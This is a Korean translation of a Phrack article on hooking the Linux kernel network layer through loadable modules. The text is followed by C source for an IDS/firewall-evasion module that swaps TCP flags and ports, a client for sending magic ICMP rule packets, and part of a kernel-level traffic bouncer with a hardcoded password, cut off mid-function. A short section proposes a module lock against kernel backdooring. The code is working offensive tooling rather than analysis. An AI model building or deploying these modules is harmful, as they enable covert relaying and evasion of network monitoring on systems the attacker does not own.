<P><FONT color=#f5f6e7 size=2>[정보보안,정보보안전문가,해킹,해커]Building Into The Linux Network Layer | 정보보안</FONT></P>
<P><FONT color=#f5f6e7>[정보보안,정보보안전문가,해킹,해커]Building Into The Linux Network Layer | 정보보안</FONT></P>
<P><FONT color=#f5f6e7>[정보보안,정보보안전문가,해킹,해커]Building Into The Linux Network Layer | 정보보안</FONT></P>
<P> </P>
<P><FONT size=2></FONT> </P>
<P><FONT size=2>----[ 소개</P>
<P><BR>아시다시피, 리눅스 커널은 단일 아키텍처를 지니고 있다. 이 말은 기본적으로<BR>커널에 의해서 실행되는 모든 코드가 커널 메모리에 올라가야 한다는 말이다.<BR>새로운 하드웨어 지원을 추가하고 그에 대한 드라이버를 추가할 때마다 커널을<BR>새로 빌드해야 하는 문제점을 해결하기 위해서, 리누스 토발즈와 그 일당(the<BR>gang)들은 현재 우리가 애용하게 된 적재 가능 모듈의 개념을 잡았으니, 이것이<BR>리눅스 커널 모듈(linux kernel modules; 줄여서 lkm)이다. 이 문서는 네트워킹<BR>레이어 내에서 lkm을 이용함으로써 얻을 수 있는 갖가지 흥미로운 것들을 짚어보는<BR>것에서 출발하여, 커널 뒷구멍 파기(kernel backdooring)에 대한 해결책을 제시하는<BR>것으로 끝마칠 것이다.<BR><BR>----[ 소켓 커널 버퍼<BR><BR>TCP/IP는 레이어로 나뉜 프로토콜 집합이다. 이것은 커널이 패킷을 정확히 해석하고<BR>소켓에 접속하기 위하여 서로 다른 패킷 레이어 사이의 처리 함수를 필요로 한다는<BR>것을 뜻한다. 첫째로, 커널은 링크 레이어를 다루는 루틴을 필요로 하고, 처리 후에<BR>IP 레이어 처리 루틴, 전송(transport) 레이어 루틴 등으로 패킷을 전달하는 루틴도<BR>필요로 한다. 그리고 각 프로토콜은 패킷을 처리함과 동시에 서로 통신할 수 있어야<BR>한다. 리눅스 환경에서 이러한 요청에 대한 응답을 처리하는 것이 소켓 커널<BR>버퍼(sk_buff)이다. 이 구조체는 서로 다른 프로토콜 레이어 사이, 그리고 네트워크<BR>디바이스 드라이버 사이에서 데이터를 주고 받는 데에 쓰인다.<BR><BR>sk_buff{} 구조체는 다음과 같다.(가장 중요한 아이템만 표시했다. 더 자세한<BR>내용을 알고 싶으면 linux/include/linux/skbuff.h 파일을 보자.)<BR><BR>sk_buff{}<BR>--------+<BR>next |<BR>--------|<BR>prev |<BR>--------|<BR>dev |<BR>--------|<BR> |<BR>--------|<BR>--------|<BR>head |---+<BR>--------| |<BR>data |---|---+<BR>--------| | |<BR>tail |---|---|---+<BR>--------| | | |<BR>end |---|---|---|---+<BR>--------|<--+ | | |<BR> | | | |<BR>--------|<------+ | |<BR>다루어질| | |<BR>패킷 | | |<BR> | | |<BR>--------|<----------+ |<BR> | |<BR> | |<BR> | |<BR>--------+<--------------+<BR><BR>next: 다음 sk_buff{} 구조체를 가리키는 포인터.<BR>prev: 이전 sk_buff{} 구조체를 가리키는 포인터.<BR>dev: 현재 사용 중인 디바이스.<BR>head: 이 패킷을 담고 있는 버퍼의 시작점을 가리키는 포인터.<BR>data: 프로토콜 데이터의 실제 시작점을 가리키는 포인터. 어떤 프로토콜 레이어를<BR> 쓰고 있느냐에 따라 달라질 수 있다.<BR>tail: 프로토콜 데이터의 끝을 가리키는 포인터. 역시 sk_buff가 어떤 프로토콜<BR> 레이어를 쓰고 있느냐에 따라 달라질 수 있다.<BR>end: 이 패킷을 담고 있는 버퍼의 끝을 가리키는 포인터. 고정값.<BR><BR>더 재미있게, 다음 상황을 생각해보자:<BR><BR>- 호스트 A가 호스트 B에 패킷을 보낸다.<BR><BR>- 호스트 B는 정상적인 네트워크 디바이스를 통하여 패킷을 받는다.<BR><BR>- 네트워크 디바이스는 데이터를 sk_buff 데이터 구조로 변환한다.<BR><BR>- 이 데이터 구조가 백로그 큐(backlog queue)에 추가된다.<BR><BR>- 스케줄러가 패킷을 어떤 프로토콜 레이어로 전달할지 결정한다.<BR><BR>따라서, 한가지 질문이 생긴다... 스케줄러는 데이터를 어떤 프로토콜로<BR>전달할지를 어떻게 결정하는가? 각 프로토콜은 packet_type{} 데이터 구조에<BR>등록되어 있고, packet_type{}은 ptype_all 리스트 또는 ptype_base 해시 테이블에<BR>의해 유지된다. packet_type{} 데이터 구조는 프로토콜 타입, 네트워크 디바이스,<BR>프로토콜 전달 데이터 처리 루틴에 대한 포인터, 그리고 다음 packet_type{} 구조에<BR>대한 포인터를 담고 있다. 네트워크 핸들러는 들어오는 패킷(sk_buff 형태)의<BR>프로토콜 타입 하나와 packet_type{} 구조체 하나 이상을 서로 대응시킨다.<BR>그러면 sk_buff는 대응하는 프로토콜의 핸들링 루틴으로 넘어간다.<BR><BR>----[ The Hack<BR><BR>우리가 할 일은 packet_type{} 데이터 구조를 등록시켜 디바이스 드라이버로부터<BR>나온 직후에 들어오는 모든 패킷(sk_buff 형태)을 다룰 수 있는 커널 모듈을 짜는<BR>것이다. 생각보다는 쉽다. packet_type{} 구조체를 채우고 그것을 커널 외부 함수<BR>dev_add_pack()를 써서 등록한다. 핸들러는 디바이스 드라이버와 다음 루틴 핸들러<BR>(바로 직전에는 첫번째였던 핸들러) 사이에 놓이게 된다. 이것은 디바이스<BR>드라이버로부터 오는 모든 sk_buff가 첫번째로 패킷 핸들러를 통과해야 한다는<BR>것을 의미한다.<BR><BR>----[ 예제<BR><BR>실제 상황의 세가지 예제를 보인다. 프로토콜 변이 레이어, 커널 레벨 패킷 바운서,<BR>그리고 커널 레벨 패킷 스니퍼이다.<BR><BR>----[ OTP (Obscure Transport Protocol)<BR><BR>첫번째 예제는 매우 간단하다.(그리고 재미있다.) 클라이언트-서버 환경에서<BR>작동하며, 두 개의 모듈을 올려야 한다. 하나는 클라이언트 쪽에 올리고, 다른<BR>하나는 서버 쪽에 올린다. 클라이언트 모듈은 SYN 플래그를 달고 있는 TCP 패킷을<BR>모두 잡아내어 SYN 플래그를 FIN 플래그로 바꾼다. 서버 모듈은 정확히 반대 역할을<BR>하여 FIN 플래그를 SYN 플래그로 바꾼다. 재미있는 점은, 양측 모두 통상적인<BR>접속이 물밑에서 이루어지고 있지만 네트워크 상에서 그것을 감지할 때에는<BR>비정상적으로 보인다는 점이다. 포트와 출발지 주소에 대해서도 마찬가지이다.<BR>네트워크로부터 찾아낸 예제를 하나 보자.<BR><BR>다음 시나리오를 생각해 보자. 'doubt'라는 호스트가 'hardbitten'이라는 호스트에<BR>텔넷 접속을 하려 한다. 서버와 클라이언트 측에 모두 우리의 모듈을 올리고<BR>23번 포트와 80번 포트를 바꾸고 SYN을 FIN으로, FIN을 SYN으로 바꾼다.<BR><BR>[lifeline@doubt ITP]$ telnet hardbitten<BR>통상적인 접속(모듈을 올리지 않은 상태)은 다음과 같다:<BR><BR>03:29:56.766445 doubt.1025 > hardbitten.23: tcp (SYN)<BR>03:29:56.766580 hardbitten.23 > doubt.1025: tcp (SYN ACK)<BR>03:29:56.766637 doubt.1025 > hardbitten.23: tcp (ACK)<BR><BR>(초기 접속 요청, 즉 3-way 핸드셰이크이다.)<BR><BR>이제 모듈을 올리고 같은 절차를 반복했다. 네트워크를 관찰하면 접속이 다음과<BR>같이 보일 것이다.<BR><BR>03:35:30.576331 doubt.1025 > hardbitten.80: tcp (FIN)<BR>03:35:30.576440 hardbitten.80 > doubt.1025: tcp (FIN ACK)<BR>03:35:30.576587 doubt.1025 > hardbitten.80: tcp (ACK)<BR><BR>무슨 일이 일어났느냐 하면, 'doubt'가 'hardbitten'에 대해 성공적으로 텔넷<BR>세션을 요청했다. 대부분의 IDS와 방화벽 정책을 교묘히 빠져나갈 수 있는 멋진<BR>방법이다. 이것도 아주 재미있다. :-)<BR><BR>아, 한가지 문제점이 있다. TCP 접속을 종료할 때에 위에서 말했듯이 FIN이<BR>SYN으로 바뀌는 것이다. 이를 해결하기 위한 쉬운 방법이 있는데, 소켓이<BR>TCP_LISTEN, TCP_SYN_SENT, 또는 TCP_SYN_RECV 상태일 때에는 lkm이 플래그를<BR>또다시 바꾸도록 만드는 것이다. "스크립트 키디"에 의해 악용되지 않기 위해서<BR>이것을 직접 구현하지는 않았다. 내가 너무 바빠서이기도 하고 너무 게을러서이기도<BR>하다. 그러나 어렵지는 않을테니 한번 해보도록. 당신을 믿는다.<BR><BR>----[ 커널 트래픽 바운서<BR><BR>이 패킷 중계 도구는 이 시점에서 주로 개념을 증명하기 위한 것이다. 앞의 예제와<BR>결합되면 특히 흥미롭다. 들어오는 모든 패킷을 지켜보고 있는 'medusa'라는<BR>호스트에 모듈을 올린다. 'hydra'라는 대상 호스트는 'medusa'로부터 텔넷 접속만<BR>받아들인다. 그러나 'medusa'에 로그인하는 것은 이미 root가 로그인한 상태이므로<BR>너무 위험하다. 하지만 걱정 없다. 매직 쿠키 또는 암호와 출발지, 도착지의 IP,<BR>포트 번호의 쌍(출발지 IP:출발지 포트, 도착지 IP:도착지 포트)을 포함하는<BR>ICMP_ECHO_REQUEST 패킷을 전송하면 된다. 출발지 포트를 생략해도 별 문제는 없다.<BR>(바로 아래의 예제에서도 그렇게 할 것이다.) 우리가 올린 모듈은 이 쿠키를<BR>받아들여 처리할 것이다. `출발지 IP:출발지 포트'에서 `medusa:도착지 포트'로<BR>가는 패킷은 모두 `도착지 IP:도착지 포트'로 전송되는 것을 볼 수 있다.<BR><BR>다음 예제는 이 과정을 멋지게 보여준다.<BR><BR>- 호스트 medusa에는 바운서 모듈이 설치되어 있다.<BR><BR>- 호스트 medusa는 <출발지 IP:출발지 포트, 도착지 IP:도착지 포트> 형태의<BR> 매직 ICMP 패킷을 받아들인다.<BR><BR>- `출발지 IP:출발지 포트'로부터 호스트 medusa로 도착지 포트 번호와 함께<BR> 전송되는 모든 패킷은 도착지 IP로 라우트될 것이고, 그 반대의 경우도<BR> 마찬가지이다. 패킷은 medusa의 스택 나머지 공간에서 처리되지는 않는다.<BR><BR>위에서 밝혔듯이, 코드 예제에서는 바운서에 보내는 정보 중에서 출발지 포트<BR>정보를 없애 버렸다. 따라서 모든 출발지 포트 번호에 대해 패킷을 받아들일 것이다.<BR>이것은 매우 위험하다: 아래와 같은 바운싱 규칙을 호스트 'medusa'에 적용시켰다고<BR>생각해보자.<BR><BR><intruder, hydra:23><BR><BR>그리고 'medusa'로부터 'hydra'로 텔넷 접속해보자. 안될 것이다. hydra로부터<BR>돌아오는 모든 패킷이 'intruder'로 전송될테니 말이다. 따라서 텔넷을 실행시킨<BR>사용자에게는 어떠한 응답도 보이지 않는다. 침입자(Intruder)는 접속을 시작하지도<BR>않았으니, 보나마나 패킷을 무시할 것이다. 출발지 포트를 규칙에 사용하면 이러한<BR>위험을 줄일 수 있지만, 우리의 바운싱 규칙에 사용한 출발지 포트와 같은 포트를<BR>medusa 내의 어떤 사용자가 쓰고 있을 가능성은 여전히 남아 있다.(커널 소스의<BR>마스커레이딩 코드를 살펴보자.)<BR><BR>부연 설명하자면, 이 기법은 거의 모든 프로토콜에 사용될 수 있다. 포트<BR>abstraction(UDP/TCP)이 없는 프로토콜에서도 말이다. ICMP 바운싱조차도 쿠키를<BR>이용하여 할 수 있다. IP 마스커레이딩보다 더 저수준의 접근법이고, 내 의견으로는<BR>더 좋은 접근법이다. :)<BR><BR>바운서에 관한 쟁점:<BR><BR>- 출발지 포트 모호성. 내 의견으로는, 이것을 해결하려면 출발지 포트 없이 규칙을<BR> 받아들이고, SYN 패킷이 바운서에 도착한 후에 출발지 포트를 규칙에 추가하는<BR> 것이 좋다. 그러면 규칙은 접속에 대해서만 영향을 끼칠 것이다. 출발지 포트는<BR> RST 또는 패킷 타임아웃 대기 시그널에 의해 삭제될 것이다.<BR>- 규칙에 타임아웃을 설정하지 말자.<BR>- 바운서는 IP 파편(fragment)을 다루지 말도록 하자.<BR><BR>물론 더 커다란 쟁점이 존재한다. 디바이스를 통해 패킷을 전송하는 출발지를<BR>생각해 보자. 라우터에게는 좋지 않은 상황이다. 이런 상황은 패킷의 출발지<BR>디바이스의 하드웨어 주소에 직접 접근할 방법밖에 없는 경우에 발생한다. 또다른<BR>디바이스에 대한 라우팅을 구현하기 위해서, IP 라우팅 테이블을 참조하고 패킷을<BR>보낼 디바이스와 도착지의 MAC 주소를 찾아야 한다.(이더넷 디바이스인 경우에.)<BR>물론 ARP 요청이 필요할 것이다. 이것은 매우 까다로운 과정이다. 이렇게 네트워크에<BR>의존적이면 정말 골치아파질 수 있다. TTL에 의해 expire될 때까지 두 호스트<BR>사이에서 꼼짝 못하고 묶여 있을 수도 있고, 아니면 네트워크 트래픽 과잉이<BR>발생할 때까지 무사히 빠져나오지 못할 수도 있다.<BR><BR>----[ 커널 기반 스니퍼<BR><BR>개념 도구의 또다른 예제인 스니퍼는 바운서보다 더 간단하다. 모든 프로토콜<BR>핸들러를 제쳐두고 소켓 버퍼 핸들러를 쓰며, TCP 패킷을 관찰하여 파일에 기록한다.<BR>물론 몇가지 어려움이 존재한다. 서로 다른 접속으로부터 패킷을 확인할 수 있어야<BR>하고, 정상적인 결과를 얻기 위하여 TCP 패킷의 시퀀스 혼선(out-of-sequence)을<BR>바로잡아야 한다. 이것은 특히 텔넷 접속의 경우에 더욱 고약하다.<BR><BR>(타임아웃 특성은 빠져 있다. 그리고 하나 이상의 접속을 동시에 스니핑하는<BR>기능도 마찬가지이다. (조금 어렵다.) )<BR><BR>이론적으로, 모듈은 모든 결과값을 커널 메모리에 저장하고 우리에게 넘겨주어야<BR>한다.(우리가 원하면 특별한 패킷으로 보낼 것이다.) 그러나 이 글은 개념 증명이고,<BR>완벽한 "스크립트 키디" 문서가 아니기 때문에, 현명한 독자 여러분이 코드를<BR>개선하고, 배우고, 실제로 실행해보시길 바란다. :)<BR><BR>----[ 커널 해킹에 대한 해결책<BR><BR>자, 커널 이리저리 곯려주는 게 재미있는가? 비극을 끝내자. 리눅스 커널은 당신의<BR>친구이다! :) /dev/kmem을 이용한 커널 패치에 대한 Silvio의 훌륭한 문서를<BR>읽어보았다. 이제 모듈 지원 없이 커널을 컴파일하는 것만으로는 해결되지 않는다.<BR>한가지 아이디어를 제시한다. 코드 짜기도 정말 쉽다. 하나의 모듈인데,(물론 아까<BR>얘기한 모듈과는 다른 것이다.) 커널에 올라가면 다른 모듈이 더이상 올라오지<BR>못하게 막고, /dev/kmem을 읽기전용 디바이스로 바꾸어버리는 모듈이다.(커널<BR>메모리는 ring 0 권한이 있어야만 접근할 수 있다.) 따라서 커널 루틴이 외부에<BR>의해 접근 가능해지지 않는 한, 커널 메모리를 건드릴 수 있는 것은 오직 커널<BR>뿐이다. 이것이 결코 새로운 개념이 아니라는 것을 독자 여러분은 알아야 한다.<BR>Securelevel은 커널 2.0.x에 조금 구현되어 있고, /dev/kmem, /dev/mem, /dev/hd*<BR>와 같은 핵심 디바이스에 직접 쓰지 못하게 하는 멋진 기능을 지니고 있다.<BR>2.2.x에는 구현되어 있지 않기 때문에, 설명한 바와 같이 모듈로서 존재하는 것이<BR>좋을 것이다. 관리자가 모듈을 올리면서 시스템 보안을 조금 더 강화하고 싶다면,<BR>방금 설명한 모듈 'lock'을 올리면 된다. 그럼 더 이상의 커널 해킹은 없다. 이것은<BR>물론 다른 방법과 병행되어야 한다. 진짜 보안에 강한 시스템은 이 모듈을 올려<BR>놓고서 커널 이미지를 플로피 디스크 드라이브와 같은 읽기전용 매체에 저장하고,<BR>또 lilo와 같은 부트 로더를 쓰지 않을 것이다. CMOS 데이터 보안도 고려할 필요가<BR>있다. 그러면 플로피를 이용하여 부트하면 된다. 최근 IRC(liquidk 채널)에서 논의된<BR>내용과 같이, rooted 시스템에서는 CMOS 보안이 어려워보일 수 있다. 하지만, 그것은<BR>이 글의 주제에서 벗어난다. 이 아이디어는 모듈을 사용하지 않고 커널 내부에서<BR>바로 구현 가능할 것이다. 2.2.x에서 매우 안전한 레벨까지 구현되어 이 기능을 볼<BR>수 있기를 기대한다. :)<BR><BR>----[ 참고자료<BR><BR>+ The Linux Kernel by David A. Rusling<BR>+ TCP/IP Illustrated, Volume 1 by W. Richard Stevens (Addison Wesley)<BR>+ Phrack Issue 52, article 18 (P52-18) by plaguez.<BR>+ Windows 98 Unleashed by Stev...오, 이런. 이 책일리가 없는데... :-)<BR><BR>----[ 사례<BR><BR>두 저자 모두 아래 분들에게 감사드립니다:<BR>+ HPT (http://www.hackers-pt.org)의 수많은 멍청이들(헤헤).<BR>+ pmsac@toxyn.org 커널 기반 스니퍼에 대한 아이디어 제공과 지원에 대해.<BR>+ LiquidK OTP 개념과 우리의 '무적' 개념 몇개를 제공해주신 것에 대해. :)<BR>+ 포르투갈의 leet hackers 모두에게. 누군지 다 아실 겁니다.<BR> The scene shall be one again!! :)<BR><BR>----[ 코드: OTP<BR><BR><++> P55/Linux-lkm/OTP/otp.c !bf8d47e0<BR>/*<BR>* Obscure Transport Protocol<BR>*<BR>* Goal: Change TCP behavior to evade IDS and firewall policies.<BR>*<BR>* lifeline (c) 1999<BR>* <arai@hackers-pt.org><BR>*<BR>* gcc -O6 -c otp.c -I/usr/src/linux/include<BR>* insmod otp.o dev=eth0 ip=123.123.123.123<BR>*<BR>* In ip= use only numerical dotted ip's!!<BR>* Btw, this is the ip of the other machine that also has the module.<BR>*<BR>* Load this module in both machines putting in the ip= argument each other's<BR>* machine numerical dotted ip.<BR>*<BR>* Oh, and don't even think about flaming me if this fucks up your machine,<BR>* it works fine on mine with kernel 2.2.5.<BR>* This tool stands on its own. I'm not responsible for any damage caused by it.<BR>*<BR>* You will probably want to make some arrangements with the #define's below.<BR>*<BR>*/<BR><BR>#define MODULE<BR>#define __KERNEL__<BR><BR>#include <linux/config.h><BR>#include <linux/module.h><BR>#include <linux/version.h><BR><BR>#include <linux/byteorder/generic.h><BR>#include <linux/netdevice.h><BR>#include <net/protocol.h><BR>#include <net/pkt_sched.h><BR>#include <net/tcp.h><BR>#include <net/ip.h><BR>#include <linux/if_ether.h><BR>#include <linux/ip.h><BR>#include <linux/tcp.h><BR>#include <linux/skbuff.h><BR>#include <linux/icmp.h><BR><BR>#include <linux/kernel.h><BR>#include <linux/mm.h><BR>#include <linux/file.h><BR>#include <asm/uaccess.h><BR><BR>/* Define here if you want to swap ports also */<BR>#define REALPORT 23 /* port you which to communicate */<BR>#define FAKEPORT 80 /* port that appears on the wire */<BR><BR>char *dev, *ip;<BR>MODULE_PARM(dev, "s");<BR>MODULE_PARM(ip, "s");<BR>struct device *d;<BR><BR>struct packet_type otp_proto;<BR><BR>__u32 in_aton(const char *);<BR><BR>/* Packet Handler Function */<BR>int otp_func(struct sk_buff *skb, struct device *dv, struct packet_type *pt) {<BR><BR> unsigned long int magic_ip;<BR> unsigned int fin = skb->h.th->fin;<BR> unsigned int syn = skb->h.th->syn;<BR><BR> magic_ip = in_aton(ip);<BR><BR> if ((skb->pkt_type == PACKET_HOST || skb->pkt_type == PACKET_OUTGOING)<BR> && (skb->nh.iph->saddr == magic_ip || skb->nh.iph->daddr == magic_ip)<BR> && (skb->h.th->source == FAKEPORT) || (skb->h.th->dest == FAKEPORT)) {<BR><BR> if (skb->h.th->source == FAKEPORT) skb->h.th->source = htons(REALPORT);<BR> if (skb->h.th->dest == FAKEPORT) skb->h.th->dest = htons(REALPORT);<BR><BR> if (skb->h.th->fin == 1) {<BR> skb->h.th->fin = 0;<BR> skb->h.th->syn = 1;<BR> goto bye;<BR> }<BR> if (skb->h.th->syn == 1) {<BR> skb->h.th->fin = 1;<BR> skb->h.th->syn = 0;<BR> }<BR> }<BR><BR> bye:<BR> kfree_skb(skb);<BR> return 0;<BR>}<BR><BR>/*<BR>* Convert an ASCII string to binary IP.<BR>*/<BR><BR>__u32 in_aton(const char *str) {<BR> unsigned long l;<BR> unsigned int val;<BR> int i;<BR><BR> l = 0;<BR> for (i = 0; i < 4; i++) {<BR> l <<= 8;<BR> if (*str != '\0') {<BR> val = 0;<BR> while (*str != '\0' && *str != '.') {<BR> val *= 10;<BR> val += *str - '0';<BR> str++;<BR> }<BR> l |= val;<BR> if (*str != '\0')<BR> str++;<BR> }<BR> }<BR> return(htonl(l));<BR>}<BR><BR>int init_module() {<BR><BR> if(!ip) {<BR> printk("Error: missing end-host ip.\n");<BR> printk("Usage: insmod otp.o ip=x.x.x.x [dev=devname]\n\n");<BR> return -ENXIO;<BR> }<BR><BR> if (dev) {<BR> d = dev_get(dev);<BR> if (!d) {<BR> printk("Did not find device %s!\n", dev);<BR> printk("Using all known devices...");<BR> }<BR> else {<BR> printk("Using device %s, ifindex: %i\n",<BR> dev, d->ifindex);<BR> otp_proto.dev = d;<BR> }<BR> }<BR> else<BR> printk("Using all known devices(wildcarded)...\n");<BR><BR> otp_proto.type = htons(ETH_P_ALL);<BR><BR> otp_proto.func = otp_func;<BR> dev_add_pack(&otp_proto);<BR><BR> return(0);<BR>}<BR><BR>void cleanup_module() {<BR> dev_remove_pack(&otp_proto);<BR> printk("OTP unloaded\n");<BR>}<BR><--><BR><BR><++> P55/Linux-lkm/Bouncer/brules.c !677bd859<BR>/*<BR>* Kernel Bouncer - Rules Client<BR>* brules.c<BR>*<BR>* lifeline|arai (c) 1999<BR>* arai@hackers-pt.org<BR>*<BR>* Btw, needs libnet (http://www.packetfactory.net/libnet).<BR>* Be sure to use 0.99d or later or this won't work due to a bug in previous versions.<BR>*<BR>* Compile: gcc brules.c -lnet -o brules<BR>* Usage: ./brules srcaddr dstaddr password srcaddr-rule dstaddr-rule dstport-rule protocol-rule<BR>*<BR>* srcaddr - source address<BR>* dstaddr - destination adress (host with the bouncer loaded)<BR>* password - magic string for authentication with module<BR>* srcaddr-rule - source address of new bouncing rule<BR>* dstaddr-rule - destination address of new bouncing rule<BR>* dstport-rule - destination port of new bouncing rule<BR>* protocol-rule - protocol of new bouncing rule (tcp, udp or icmp), 0 deletes all existing rules<BR>*<BR>* Example:<BR>* # ./brules 195.138.10.10 host.domain.com lifeline 192.10.10.10 202.10.10.10 23 tcp<BR>*<BR>* This well tell 'host.domain.com' to redirect all connections to port 23<BR>* from '192.10.10.10', using TCP as the transport protocol, to the same port,<BR>* using the same protocol, of host '202.10.10.10'.<BR>* Of course, host.domain.com has to be with the module loaded.<BR>*<BR>* Copyright (c) 1999 lifeline <arai@hackers-pt.org><BR>* All rights reserved.<BR>*<BR>*/<BR><BR>#include <stdio.h><BR>#include <libnet.h><BR><BR>#define MAGIC_STR argv[3]<BR><BR>int main(int argc, char **argv) {<BR><BR> struct rule {<BR> u_long srcaddr, dstaddr;<BR> u_char protocol;<BR> u_short destp;<BR> struct rule *next;<BR> } *rules;<BR><BR> unsigned char *buf;<BR> u_char *payload;<BR> int c, sd, payload_s={0};<BR><BR> if (argc != 8) {<BR> printf("Kernel Bouncer - Rules Client\n");<BR> printf("arai|lifeline (c) 1999\n\n");<BR> printf("Thanks to Kossak for the original idea.\n");<BR> printf("Usage: %s srcaddr dstaddr password srcaddr-rule dstaddr-rule dstport-rule protocol-rule\n", argv[0]);<BR> exit(0);<BR> }<BR><BR> rules = (struct rule *)malloc(sizeof(struct rule));<BR> rules->srcaddr = libnet_name_resolve(argv[4], 1);<BR> rules->dstaddr = libnet_name_resolve(argv[5], 1);<BR> rules->destp = htons(atoi(argv[6]));<BR> rules->protocol = atoi(argv[7]);<BR> if(strcmp(argv[7], "tcp")==0)rules->protocol = IPPROTO_TCP;<BR> if(strcmp(argv[7], "udp")==0)rules->protocol = IPPROTO_UDP;<BR> if(strcmp(argv[7], "icmp")==0)rules->protocol = IPPROTO_ICMP;<BR> rules->next = 0;<BR><BR> payload = (u_char *)malloc(strlen(MAGIC_STR) + sizeof(struct rule));<BR> memcpy(payload, MAGIC_STR, strlen(MAGIC_STR));<BR> memcpy((struct rule *)(payload + strlen(MAGIC_STR)), rules, sizeof(struct rule));<BR> payload_s = strlen(MAGIC_STR) + sizeof(struct rule);<BR><BR> buf = malloc(8 + IP_H + payload_s);<BR> if((sd = open_raw_sock(IPPROTO_RAW)) == -1) {<BR> fprintf(stderr, "Cannot create socket\n");<BR> exit(EXIT_FAILURE);<BR> }<BR><BR> libnet_build_ip(8 + payload_s, 0, 440, 0, 64,<BR> IPPROTO_ICMP, name_resolve(argv[1], 1),<BR> name_resolve(argv[2], 1), NULL, 0, buf);<BR><BR> build_icmp_echo(8, 0, 242, 55, payload, payload_s, buf + IP_H);<BR><BR> if(libnet_do_checksum(buf, IPPROTO_ICMP, 8 + payload_s) == -1) {<BR> fprintf(stderr, "Can't do checksum, packet may be invalid.\n");<BR> }<BR><BR>#ifdef DEBUG<BR> printf("type -> %d\n", *(buf+20));<BR> printf("code -> %d\n", *(buf+20+1));<BR> printf("checksum -> %d\n", *(buf+20+2));<BR>#endif<BR><BR> c = write_ip(sd, buf, 8 + IP_H + payload_s);<BR> if (c < 8 + IP_H + payload_s) {<BR> fprintf(stderr, "Error writing packet.\n");<BR> exit(EXIT_FAILURE);<BR> }<BR>#ifdef DEBUG<BR> printf("%s : %p\n", buf+28, buf+28);<BR>#endif<BR><BR> printf("Kernel Bouncer - Rules Client\n");<BR> printf("lifeline|arai (c) 1999\n\n");<BR> printf("Rules packet sent to %s.\n", argv[2]);<BR><BR> free(rules);<BR> free(payload);<BR> free(buf);<BR>}<BR><--><BR><++> P55/Linux-lkm/Bouncer/bouncer.c !f3ea817c<BR>/*<BR>* krnbouncer.c - A kernel based bouncer module<BR>*<BR>* by kossak<BR>* kossak@hackers-pt.org || http://www.hackers-pt.org/kossak<BR>*<BR>* This file is licensed by the GNU General Public License.<BR>*<BR>* Tested on a 2.2.5 kernel. Should compile on others with minimum fuss.<BR>* However, I'm not responsible for setting fire on your computer, loss of<BR>* mental health, bla bla bla...<BR>*<BR>* CREDITS: - Plaguez and Halflife for an excelent phrack article on<BR>* kernel modules.<BR>* - the kernel developers for a great job (no irony intended).<BR>*<BR>* USAGE: gcc -O2 -DDEBUG -c krnbouncer.c -I/usr/src/linux/include ;<BR>* insmod krnsniff.o [dev=<device>]<BR>*<BR>* TODO : - manage to send a packet thru another device than the one<BR>* the packet is originating from (difficult, but not important)<BR>* - implement a timeout for the bounce rules<BR>* - the rules should store a source port for checking the<BR>* connection (important)<BR>* - turn this into a totally protocol independent IP based<BR>* bouncer (quite a challenge :))<BR>*<BR>* NOTE : don't try to use this module to bounce connections of different<BR>* types, such as bouncing packets from a ppp device to an ethernet<BR>* device and vice-versa. That was not tested and may crash your<BR>* machine.<BR>*/<BR><BR>#define MODULE<BR>#define __KERNEL__<BR><BR>#include <linux/config.h><BR>#include <linux/module.h><BR>#include <linux/version.h><BR><BR>#include <linux/byteorder/generic.h><BR>#include <linux/netdevice.h><BR>#include <net/protocol.h><BR>#include <net/pkt_sched.h><BR>#include <net/tcp.h><BR>#include <linux/if_ether.h><BR>#include <linux/ip.h><BR>#include <linux/tcp.h><BR>#include <linux/skbuff.h><BR>#include <linux/icmp.h><BR><BR>#include <linux/kernel.h><BR>#include <linux/mm.h><BR>#include <linux/file.h><BR>#include <asm/uaccess.h><BR><BR>#include <linux/time.h><BR><BR>#define DBGPRN1(X) if (debug) printk(KERN_DEBUG X)<BR>#define DBGPRN2(X,Y) if (debug) printk(KERN_DEBUG X, Y);<BR>#define DBGPRN3(X,Y,Z) if (debug) printk(KERN_DEBUG X, Y, Z);<BR>#define DBGPRN4(X,Y,Z,W) if (debug) printk(KERN_DEBUG X, Y, Z, W);<BR>#define DBGPRN5(X,Y,Z,W,V) if (debug) printk(KERN_DEBUG X, Y, Z, W, V);<BR><BR>#define TRUE -1<BR>#define FALSE 0<BR><BR>#define MAXRULES 8 /* Max bouncing rules. */<BR>#define RULEPASS "kossak"<BR><BR>/*<BR>#define SOURCEIP "a.b.c.d"<BR>#define DESTIP "e.f.g.h"<BR>*/<BR><BR>/* global data */<BR>int debug, errno;<BR><BR>struct rule {<BR> __u32 source, dest;<BR> __u8 proto;<BR> __u16 destp; /* TCP and UDP only */<BR> struct rule *next;<BR>};<BR><BR>/* this is a linked list */<BR>struct rule *first_rule;<BR><BR>char *dev;<BR>MODULE_PARM(dev, "s"); /* gets the parameter dev=<devname> */<BR>struct device *d;<BR><BR>struct packet_type bounce_proto;<BR><BR>/* inicial function declarations */<BR><BR>char *in_ntoa(__u32 in);<BR>__u32 in_aton(const char *str);<BR>int filter(struct sk_buff *);<BR>int m_strlen(char *);<BR>char *m_memcpy(char *, char *, int);<BR>int m_strcmp(char *, const char *);<BR><BR>void process_pkt_in(struct sk_buff *);<BR>void bounce_and_send(struct sk_buff *, __u32 new_host);<BR>void clear_bounce_rules(void);<BR>void process_bounce_rule(struct rule *);<BR><BR>/* our packet handler */<BR>int pkt_func(struct sk_buff *skb, struct device *dv, struct packet_type *pt) {<BR><BR> switch (skb->pkt_type) {<BR> case PACKET_OUTGOING:<BR> break;<BR> case PACKET_HOST:<BR> process_pkt_in(skb);<BR> break;<BR> case PACKET_OTHERHOST:<BR> break;<BR> default:<BR> kfree_skb(skb);<BR> return 0;<BR> }<BR><BR>}<BR><BR>void bounce_and_send(struct sk_buff *skb, __u32 new_host) {<BR><BR> struct tcphdr *th;<BR> struct iphdr *iph;<BR> unsigned char dst_hw_addr[6];<BR> unsigned short size;<BR> int doff = 0;<BR> int csum = 0;<BR> int offset;<BR><BR> th = skb->h.th;<BR> iph = skb->nh.iph;<BR><BR> skb->pkt_type = PACKET_OUTGOING; /* this packet is no longer for us */<BR><BR> /* we swap the ip addresses */<BR> iph->saddr = skb->nh.iph->daddr;<BR> iph->daddr = new_host;<BR><BR> size = ntohs(iph->tot_len) - (iph->ihl * 4);<BR> doff = th->doff << 2;<BR><BR> /* calculate checksums again... bleh! :P */<BR> skb->csum = 0;<BR> csum = csum_partial(skb->h.raw + doff, size - doff, 0);<BR> skb->csum = csum; /* data 